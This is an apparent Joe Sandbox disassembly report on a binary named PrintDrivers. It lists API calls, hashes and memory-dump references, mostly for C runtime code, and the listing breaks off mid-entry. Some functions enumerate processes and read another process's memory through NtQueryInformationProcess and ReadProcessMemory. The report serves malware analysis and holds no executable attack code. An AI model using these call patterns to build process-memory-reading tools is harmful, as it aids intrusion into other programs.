                                                                    Similarity
                                                                    • API ID: H_prolog3Lockitstd::_$Lockit::_Lockit::~_
                                                                    • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                    • API String ID: 1538362411-2891247106
                                                                    • Opcode ID: 765ea775684917bd1ba98907b0d440319a9d5a5d2051c14a1492cf7999e543c2
                                                                    • Instruction ID: f0bcf630a922c56b5223952128349d42c72913e019d4525737680696a2590777
                                                                    • Opcode Fuzzy Hash: 765ea775684917bd1ba98907b0d440319a9d5a5d2051c14a1492cf7999e543c2
                                                                    • Instruction Fuzzy Hash: 55A135B550020AAFDF05DF94CC86EEE7FBAFF48308F104819FA56A6291D7319921DB61
                                                                    APIs
                                                                    • __EH_prolog3.LIBCMT ref: 005A2B0B
                                                                      • Part of subcall function 00588830: std::_Lockit::_Lockit.LIBCPMT ref: 00588860
                                                                      • Part of subcall function 00588830: std::_Lockit::_Lockit.LIBCPMT ref: 00588882
                                                                      • Part of subcall function 00588830: std::_Lockit::~_Lockit.LIBCPMT ref: 005888AA
                                                                      • Part of subcall function 00588830: std::_Lockit::~_Lockit.LIBCPMT ref: 005889E2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Lockitstd::_$Lockit::_Lockit::~_$H_prolog3
                                                                    • String ID: %H : %M$%H : %M : %S$%I : %M : %S %p$%b %d %H : %M : %S %Y$%d / %m / %y$%m / %d / %y$:AM:am:PM:pm
                                                                    • API String ID: 1383202999-2891247106
                                                                    • Opcode ID: 6820d69a2bced090828e2fea3b71c33caab1ef714004be78f8be2f1a572f2157
                                                                    • Instruction ID: f45600d45e18755bfeccc1ba266b70f27610fddd9d149efd77ee27aabdbc609c
                                                                    • Opcode Fuzzy Hash: 6820d69a2bced090828e2fea3b71c33caab1ef714004be78f8be2f1a572f2157
                                                                    • Instruction Fuzzy Hash: C3A1477150020AAFDF09DF88CC96EFE7FB9FF4A314F10441AFA46A6292D6319911DB61
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00587C17
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00587C39
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00587C61
                                                                    • LocalAlloc.KERNEL32(00000040,00000044,00000000,F3F544E4,00000000,00000000), ref: 00587CB9
                                                                    • __Getctype.LIBCPMT ref: 00587D3B
                                                                    • std::_Facet_Register.LIBCPMT ref: 00587DA4
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 00587DCE
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                    • String ID: iw]
                                                                    • API String ID: 2372200979-3454266309
                                                                    • Opcode ID: 49179456f8407aff766adabe7269e02524d73da75bdc3014167c7605c4d27f93
                                                                    • Instruction ID: f1c85ab3ee32f1ccbdcbdc70d7537df5b42c32d4fbf3975898d107025fa681ba
                                                                    • Opcode Fuzzy Hash: 49179456f8407aff766adabe7269e02524d73da75bdc3014167c7605c4d27f93
                                                                    • Instruction Fuzzy Hash: 2461B0B1D04649CFDB11DF68C984BAABBF0FF18310F248199D885AB291E770EE45CB91
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00588860
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00588882
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005888AA
                                                                    • LocalAlloc.KERNEL32(00000040,00000018,00000000,F3F544E4,00000000,00000000,?,?,?,?,?,?,?,?,?,00000000), ref: 00588902
                                                                    • __Getctype.LIBCPMT ref: 0058897D
                                                                    • std::_Facet_Register.LIBCPMT ref: 005889B8
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 005889E2
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_GetctypeLocalRegister
                                                                    • String ID: iw]
                                                                    • API String ID: 2372200979-3454266309
                                                                    • Opcode ID: 07a34603e53d373a027715fd074cd6d42a532c501d28d547495620848ae50ada
                                                                    • Instruction ID: 9c535c9d68e69a9513b8f029b57704218bac55d8a62c40653107575c21df25dc
                                                                    • Opcode Fuzzy Hash: 07a34603e53d373a027715fd074cd6d42a532c501d28d547495620848ae50ada
                                                                    • Instruction Fuzzy Hash: AD519B71900249DFDB11DF98C848BAEBFF4FB54710F548599E885AB282DBB0AE45CF81
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: _free_wcschr
                                                                    • String ID:
                                                                    • API String ID: 3422831350-0
                                                                    • Opcode ID: e7b3b20bd1d7fb892cb48eae9b2ec3f11e8267ab4449dc657b986540ab96f720
                                                                    • Instruction ID: 50ab620e417697f474c4983b61a79a177024fcecbf29cac01fefee1a753667c4
                                                                    • Opcode Fuzzy Hash: e7b3b20bd1d7fb892cb48eae9b2ec3f11e8267ab4449dc657b986540ab96f720
                                                                    • Instruction Fuzzy Hash: E251E871D00712AFEB24AF68C886AEE7FE4FF45310B14456DFA55DB281EB34B9408B58
                                                                    APIs
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: _free
                                                                    • String ID:
                                                                    • API String ID: 269201875-0
                                                                    • Opcode ID: 805adb2b3ff58edada5dcfec6b48ba5df84cb6302272f3822834b4f448075912
                                                                    • Instruction ID: aebc0069045c733778d11c9c96d1cf4d7087dfc975c4645bdef54474c42ecae2
                                                                    • Opcode Fuzzy Hash: 805adb2b3ff58edada5dcfec6b48ba5df84cb6302272f3822834b4f448075912
                                                                    • Instruction Fuzzy Hash: 5B6172759007059FEB20DF64D845BEABBF9FF44710F14456AE955EB242EB70BD008B60
                                                                    APIs
                                                                      • Part of subcall function 005B664C: GetLastError.KERNEL32(?,?,00000008,005BB99E,00594425,0059446B), ref: 005B6651
                                                                      • Part of subcall function 005B664C: SetLastError.KERNEL32(00000000,00000006,000000FF), ref: 005B66EF
                                                                    • _free.LIBCMT ref: 005B5BD8
                                                                    • _free.LIBCMT ref: 005B5BF1
                                                                    • _free.LIBCMT ref: 005B5C2F
                                                                    • _free.LIBCMT ref: 005B5C38
                                                                    • _free.LIBCMT ref: 005B5C44
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                    • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                    • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: _free$ErrorLast
                                                                    • String ID: C$zK[
                                                                    • API String ID: 3291180501-1081286361
                                                                    • Opcode ID: 5d7a317d82ad16782ba2453c28bb84ac5a26ffe8b7964c770f8fd1abf03d8a62
                                                                    • Instruction ID: 7ad605e535239e602075470973eb50174b7290fe29dd2ea1584564061b91b7e1
                                                                    • Opcode Fuzzy Hash: 5d7a317d82ad16782ba2453c28bb84ac5a26ffe8b7964c770f8fd1abf03d8a62
                                                                    • Instruction Fuzzy Hash: 19B14B7590161A9FDB28DF18C888BE9BBB5FB48310F5445A9E84AA7251E730BE90CF40
                                                                    APIs
                                                                      • Part of subcall function 005B68F8: HeapAlloc.KERNEL32(00000000,00000001,00581AC0,?,005A5BEE,00581AC2,00581AC0,?,?,?,0058F95C,00581AC4,00581AC4), ref: 005B692A
                                                                    • _free.LIBCMT ref: 005B5571
                                                                    • _free.LIBCMT ref: 005B5588
                                                                    • _free.LIBCMT ref: 005B55A5
                                                                    • _free.LIBCMT ref: 005B55C0
                                                                    • _free.LIBCMT ref: 005B55D7
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                     • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: _free$AllocHeap
                                                                    • String ID: (\$zK[
                                                                    • API String ID: 1835388192-2438518189
                                                                    • Opcode ID: 7603b477b3b11437dac7ea8b5f454874e0addbb2f7c2bbe3bdb7b40fcba1212e
                                                                    • Instruction ID: 57af451f559f46536eb97ad8a5119cb7b768be782b5bf185542702396da378d8
                                                                    • Opcode Fuzzy Hash: 7603b477b3b11437dac7ea8b5f454874e0addbb2f7c2bbe3bdb7b40fcba1212e
                                                                    • Instruction Fuzzy Hash: 5551A172A00B059FDB25DF69C842BAABBF5FF58721B540669E805DB290F735FA018B40
                                                                    APIs
                                                                      • Part of subcall function 00583580: GetSystemDirectoryW.KERNEL32(?,00000105), ref: 005835E5
                                                                      • Part of subcall function 00583580: _wcschr.LIBVCRUNTIME ref: 00583676
                                                                    • GetProcAddress.KERNEL32(?,NtQueryInformationProcess), ref: 00583B42
                                                                    • ReadProcessMemory.KERNEL32(?,?,?,000001D8,00000000,00000000,00000018,00000000), ref: 00583B9B
                                                                    • ReadProcessMemory.KERNEL32(?,?,?,00000048,00000000,?,000001D8,00000000,00000000,00000018,00000000), ref: 00583C0E
                                                                    • ReadProcessMemory.KERNEL32(?,?,?,?,00000000,?,00000000,?,?,?,00000048,00000000,?,000001D8,00000000,00000000), ref: 00583CAF
                                                                      • Part of subcall function 00582D40: LocalFree.KERNEL32(?,F3F544E4,?,?,005C5A40,000000FF,?,005811E2,F3F544E4,?,?,005C5A75,000000FF), ref: 00582D91
                                                                    • GetLastError.KERNEL32 ref: 00583D2C
                                                                    • FreeLibrary.KERNEL32(?), ref: 00583D6D
                                                                    Strings
                                                                    • NtQueryInformationProcess, xrefs: 00583B3C
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                     • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: MemoryProcessRead$Free$AddressDirectoryErrorLastLibraryLocalProcSystem_wcschr
                                                                    • String ID: NtQueryInformationProcess
                                                                    • API String ID: 3003745107-2781105232
                                                                    • Opcode ID: 5d363593fcb2bdccf6fb22cacfe13089b1713256e206d8008e1e5ee608ca6c25
                                                                    • Instruction ID: 8207a6828a456358ba2e497c45d9681b9ffbc5986708029349b805b905dc87ab
                                                                    • Opcode Fuzzy Hash: 5d363593fcb2bdccf6fb22cacfe13089b1713256e206d8008e1e5ee608ca6c25
                                                                    • Instruction Fuzzy Hash: DB717E709017589EDB60DF64CC4DBAEBBB4FF18704F10064AE809B7280E7B96A88CF51
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0058ABD1
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0058ABEF
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0058AC17
                                                                    • LocalAlloc.KERNEL32(00000040,0000000C,00000000,F3F544E4,00000000,00000000,00000000), ref: 0058AC6F
                                                                    • std::_Facet_Register.LIBCPMT ref: 0058AD57
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0058AD81
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                     • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                    • String ID: iw]
                                                                    • API String ID: 3931714976-3454266309
                                                                    • Opcode ID: 7e541f70319a690d385de2870fc8983bb069738f2b9c5450d3aadb2c29363a48
                                                                    • Instruction ID: 7afcf501a7f1530658ba2c99a546c5dd31cf710e99cb1a58cbbf7200018e1598
                                                                    • Opcode Fuzzy Hash: 7e541f70319a690d385de2870fc8983bb069738f2b9c5450d3aadb2c29363a48
                                                                    • Instruction Fuzzy Hash: 9751CEB0900649DFEB01DF98C884BAEBFB4FF50350F24415AE855AB381D7B4AE05CB82
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0058ADD1
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0058ADEF
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0058AE17
                                                                    • LocalAlloc.KERNEL32(00000040,00000008,00000000,F3F544E4,00000000,00000000,00000000), ref: 0058AE6F
                                                                    • std::_Facet_Register.LIBCPMT ref: 0058AF03
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0058AF2D
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                     • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                    • String ID: iw]
                                                                    • API String ID: 3931714976-3454266309
                                                                    • Opcode ID: 4109a0d07c742682f49cb78f0be66b6ad299be8d3ca6975555cd278cc7597c07
                                                                    • Instruction ID: 26eae5927ab29abfb64b29b35cd7829b5b54f0199e8ee09f142babc309e7fae2
                                                                    • Opcode Fuzzy Hash: 4109a0d07c742682f49cb78f0be66b6ad299be8d3ca6975555cd278cc7597c07
                                                                    • Instruction Fuzzy Hash: E351ADB0900255DFDB15DF58C884BAEBFB8FB14710F14895EE886AB281D7B4AE45CB81
                                                                    APIs
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0058EF61
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 0058EF7F
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0058EFA7
                                                                    • LocalAlloc.KERNEL32(00000040,00000008,00000000,F3F544E4,00000003,00000000), ref: 0058EFFF
                                                                    • std::_Facet_Register.LIBCPMT ref: 0058F093
                                                                    • std::_Lockit::~_Lockit.LIBCPMT ref: 0058F0BD
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                     • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockit$Lockit::_Lockit::~_$AllocFacet_LocalRegister
                                                                    • String ID: iw]
                                                                    • API String ID: 3931714976-3454266309
                                                                    • Opcode ID: cc50ea3c00ab19484980d0144f1bb22f54c1ab8d254e620cce25396b73fde4d1
                                                                    • Instruction ID: 0355445ae2d824e3473a4108aa6af936b101da9cd377ffb16ac22cdce6568aaf
                                                                    • Opcode Fuzzy Hash: cc50ea3c00ab19484980d0144f1bb22f54c1ab8d254e620cce25396b73fde4d1
                                                                    • Instruction Fuzzy Hash: F451BB71900259DFDB11DF98C889B9EBFB4FB18310F24416DE846AB282D7B1AE45CB81
                                                                    APIs
                                                                    • LocalAlloc.KERNEL32(00000040,00000025,F3F544E4,?,?,00000000,?,F3F544E4,00000000,?,00000000,000000FF,?,00583922,?,?), ref: 00584494
                                                                    • LocalFree.KERNEL32(?,?,?,F3F544E4,?,?,00000000,?,F3F544E4,00000000,?), ref: 0058454E
                                                                    • OpenProcess.KERNEL32(00000400,00000000,?,F3F544E4,?,?,00000002), ref: 00584612
                                                                    • OpenProcess.KERNEL32(00000400,00000000,?,?,F3F544E4,?,?,00000002), ref: 00584633
                                                                    • GetProcessTimes.KERNEL32(00000000,00000002,00000000,00000000,00000000,?,F3F544E4,?,?,00000002), ref: 00584666
                                                                    • GetProcessTimes.KERNEL32(00000000,?,00000000,00000000,00000000,?,F3F544E4,?,?,00000002), ref: 00584677
                                                                    • CloseHandle.KERNEL32(00000000,?,F3F544E4,?,?,00000002), ref: 00584695
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                     • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: Process$LocalOpenTimes$AllocCloseFreeHandle
                                                                    • String ID:
                                                                    • API String ID: 657357025-0
                                                                    • Opcode ID: 5f14efd3e5ab56f80d30f4fac4511b0286eed26fc2e29b220636f09594a09982
                                                                    • Instruction ID: bc952733ca836f8ee364f024d326bb5bb5b527a5a67fc1f363079fe7e35086c6
                                                                    • Opcode Fuzzy Hash: 5f14efd3e5ab56f80d30f4fac4511b0286eed26fc2e29b220636f09594a09982
                                                                    • Instruction Fuzzy Hash: A6818E71A006169FDB14DF98C885BAEBBB5FB49710F24422AED25F7390D730AA05CF90
                                                                    APIs
                                                                    • GetCPInfo.KERNEL32(?,?), ref: 005A4586
                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 005A4614
                                                                    • __alloca_probe_16.LIBCMT ref: 005A463E
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005A4686
                                                                    • MultiByteToWideChar.KERNEL32(?,00000009,?,?,00000000,00000000), ref: 005A46A0
                                                                    • __alloca_probe_16.LIBCMT ref: 005A46C6
                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 005A4703
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                     • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: ByteCharMultiWide$__alloca_probe_16$Info
                                                                    • String ID:
                                                                    • API String ID: 2298828789-0
                                                                    • Opcode ID: 403eb96b5e428f9e333826f8534e49348bf75d3821210936325c3d0037b5f1a1
                                                                    • Instruction ID: e55fa05156f9aed6e5c9519688a500fb7af1f089c081393886bf7d319c3adc82
                                                                    • Opcode Fuzzy Hash: 403eb96b5e428f9e333826f8534e49348bf75d3821210936325c3d0037b5f1a1
                                                                    • Instruction Fuzzy Hash: F9716A72D0029AAFDF219EE4C845AEEBFB5FF8B710F294115E904A7191D7A18805CFA0
                                                                    APIs
                                                                    • CreateToolhelp32Snapshot.KERNEL32(00000002,00000000,F3F544E4,?), ref: 00583776
                                                                    • CloseHandle.KERNEL32(00000000), ref: 005837B6
                                                                    • Process32FirstW.KERNEL32(?,00000000), ref: 0058380A
                                                                    • OpenProcess.KERNEL32(00000410,00000000,?), ref: 0058382A
                                                                    • CloseHandle.KERNEL32(00000000), ref: 00583935
                                                                    • Process32NextW.KERNEL32(?,00000000), ref: 00583949
                                                                    • CloseHandle.KERNEL32(?), ref: 00583997
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                     • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: CloseHandle$Process32$CreateFirstNextOpenProcessSnapshotToolhelp32
                                                                    • String ID:
                                                                    • API String ID: 708755948-0
                                                                    • Opcode ID: 70ca775b4824651b8b8f361b6673b47ce9aa0e24fba88658b9d97fb99ea55bdb
                                                                    • Instruction ID: 8efeeabebe31f1cd7493d89c7c94df21a53fc7bb6880943f362f20a1394bd2b1
                                                                    • Opcode Fuzzy Hash: 70ca775b4824651b8b8f361b6673b47ce9aa0e24fba88658b9d97fb99ea55bdb
                                                                    • Instruction Fuzzy Hash: CC91FAB1901259DFDF10DFA8D948BEEBFF8BF48704F14815AE815AB245D7B45A08CBA0
                                                                    APIs
                                                                    • std::locale::_Init.LIBCPMT ref: 00588D63
                                                                      • Part of subcall function 00594280: __EH_prolog3.LIBCMT ref: 00594287
                                                                      • Part of subcall function 00594280: std::_Lockit::_Lockit.LIBCPMT ref: 00594292
                                                                      • Part of subcall function 00594280: std::locale::_Setgloballocale.LIBCPMT ref: 005942AD
                                                                      • Part of subcall function 00594280: std::_Lockit::~_Lockit.LIBCPMT ref: 00594303
                                                                    • std::_Lockit::_Lockit.LIBCPMT ref: 00588D8A
                                                                    • std::_Locinfo::_Locinfo_ctor.LIBCPMT ref: 00588DF0
                                                                    • std::locale::_Locimp::_Makeloc.LIBCPMT ref: 00588E4A
                                                                      • Part of subcall function 00592C98: __EH_prolog3.LIBCMT ref: 00592C9F
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.1887947839.0000000000581000.00000020.00000001.01000000.00000005.sdmp, Offset: 00580000, based on PE: true
                                                                     • Associated: 00000004.00000002.1887825782.0000000000580000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888180443.00000000005C9000.00000002.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888700844.00000000005DF000.00000004.00000001.01000000.00000005.sdmp
                                                                     • Associated: 00000004.00000002.1888783483.00000000005E3000.00000002.00000001.01000000.00000005.sdmp
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_580000_PrintDrivers.jbxd
                                                                    Similarity
                                                                    • API ID: std::_$Lockitstd::locale::_$H_prolog3Lockit::_$InitLocimp::_Locinfo::_Locinfo_ctorLockit::~_MakelocSetgloballocale
                                                                    • String ID: bad locale name$lw]
                                                                    • API String ID: 2464432770-4276613596
                                                                    • Opcode ID: 1e9c9d751c19ba0dd16ccd56d282868281b7385580510499865e346ca8aa763d
                                                                    • Instruction ID: 0237bd479b09e477856abe26063d519185a4dd1a3a32dc75428903b2d8a8c598
                                                                    • Opcode Fuzzy Hash: 1e9c9d751c19ba0dd16ccd56d282868281b7385580510499865e346ca8aa763d
                                                                    • Instruction Fuzzy Hash: 02518070D05289DEDB11DFA4C9897AEBFB8FF15304F584099D844AB282DB759E04C7A1
                                                                    APIs
                                                                    • _ValidateLocalCookies.LIBCMT ref: 005A5DF7
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 005A5DFF
                                                                    • _ValidateLocalCookies.LIBCMT ref: 005A5E88
